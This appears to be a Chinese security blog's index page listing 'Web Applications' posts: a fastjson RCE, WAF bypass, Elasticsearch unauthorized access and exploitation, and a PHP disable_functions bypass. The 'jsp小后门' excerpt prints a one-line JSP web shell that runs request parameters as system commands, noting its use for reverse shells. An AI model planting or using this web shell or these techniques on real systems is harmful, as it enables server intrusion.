Web Applications(14 篇文章)

fastjson 远程代码执行漏洞

yzmm

2017年3月18日 16:40

2524 阅读

最近发现fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞，为了保证系统安全，请升级到1.2.28/1.2.29或者更新版本。官方公告：https://github.com/alibaba/fastjson/wiki/security_update_20170315 这个可能存在的远程代码执行漏洞产生的原因是fastjson反序列化json字符串为java对象的时候autoT...

阅读全文

multipart/form-data PHP和Java通用的WAF绕过方法

yzmm

Web Applications

2015年11月30日 10:04

2243 阅读

0 评论

依旧是multipart/form-data,去年的时候说道了利用PHP的特性去绕过WAF.轻松绕各种WAF的POST注入、跨站防御(比如安全狗) 原文简单的描述了PHP在处理POST请求的时候会解析multipart/form-data的内容。那么这个multipart/form-data到底是个啥呢？大概长成上面这样.HTML代码就更加简单了: <!DOCTYPE html> ...

阅读全文

app_feature web应用特征识别库

yzmm

Web Applications

2015年8月5日 13:23

1917 阅读

12 评论

这是一个规则为json版的web应用特征识别库，直接导入mysql即可使用。数据来源http://fofa.so，有部分增减。下载地址: /uploads/file/20170330/20170330092456_926.sql ...

阅读全文

elasticsearch Snapshot And Restore缺陷利用

yzmm

Web Applications

2015年7月8日 11:00

1728 阅读

0 评论

elasticsearch服务普遍存在一个未授权访问的问题，攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。基础信息: 可以查看es节点信息，包括安装目录：http://localhost:9200/_nodes 未授权访问的elasticsearch(事实上绝大多数都没做访问授权)备份数据的时候存在一些小缺陷，可以用来进一步的获取权限。参考es官方的索引快找和恢复文档(Sn...

阅读全文

elasticsearch 未授权访问-数据库配置信息泄漏

yzmm

Web Applications

2015年5月10日 19:46

2426 阅读

1 评论

elasticsearch在安装了river之后可以同步多种数据库数据（包括关系型的mysql、mongodb等）安装过程看这里：https://github.com/jprante/elasticsearch-jdbc 那么怎么知道别人是不是在用elasticsearch的river呢？ http://localhost:9200/_cat/indices里面的indices包含了_river...

阅读全文

elasticsearch scripting security issues

yzmm

Web Applications

2015年3月5日 10:02

1352 阅读

2 评论

elasticsearch scripting: http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.html security issues: http://www.elasticsearch.org/community/security/ http://mp.weixin...

阅读全文

[zone] JavaScript 获取客户端内网IP和外网IP(STUN)

yzmm

Web Applications

2015年1月27日 11:32

2283 阅读

2 评论

FROM:http://zone.wooyun.org/content/18274 from:https://github.com/diafygi/webrtc-ips Firefox 跟 Chrome支持WebRTC可以向STUN服务器请求，返回内外网IP，不同于XMLHttpRequest请求，STUN请求开发者工具当中看不到网络请求的。测试链接 //get the IP addresses...

阅读全文

jsp小后门

yzmm

Web Applications

2014年12月17日 17:26

4927 阅读

11 评论

一：执行系统命令: 无回显执行系统命令： <%Runtime.getRuntime().exec(request.getParameter("i"));%> 请求：http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls 执行之后不会有任何回显，用来反弹个shell很方便。有回显带密码验证的: <% if("023".equals(reque...

阅读全文

[zone-phith0n]PHP 绕过Disable_functions执行命令

Anonymous

Web Applications

2014年11月24日 11:21

1848 阅读

1 评论

FROM:http://zone.wooyun.org/content/16631 先简单说一下php调用mail()函数的过程。看到源码ext/mail.c 236行： char *sendmail_path = INI_STR("sendmail_path"); char *sendmail_cmd = NULL; 从INI中获得sendmail_path变量。我们看看p...

阅读全文

[更新]Elasticsearch 代码执行漏洞利用工具

yzmm

Web Applications

2014年5月22日 21:11

1429 阅读

5 评论

更新地址：Elasticsearch_1.2.jar 命令参数忘记编码了，导致不能执行多参数已修复了。修改了超时为10秒、异常情况直接输出页面源码。 1、ElasticSearch是一个基于Lucene构建的开源，分布式，RESTful搜索引擎。设计用于云计算中，能够达到实时搜索，稳定，可靠，快速，安装使用方便。 2、Lucene是apache软件基金会4 jakarta项目组的一个子项目，是一个...

阅读全文

PHP & Java

Web Applications(14 篇文章)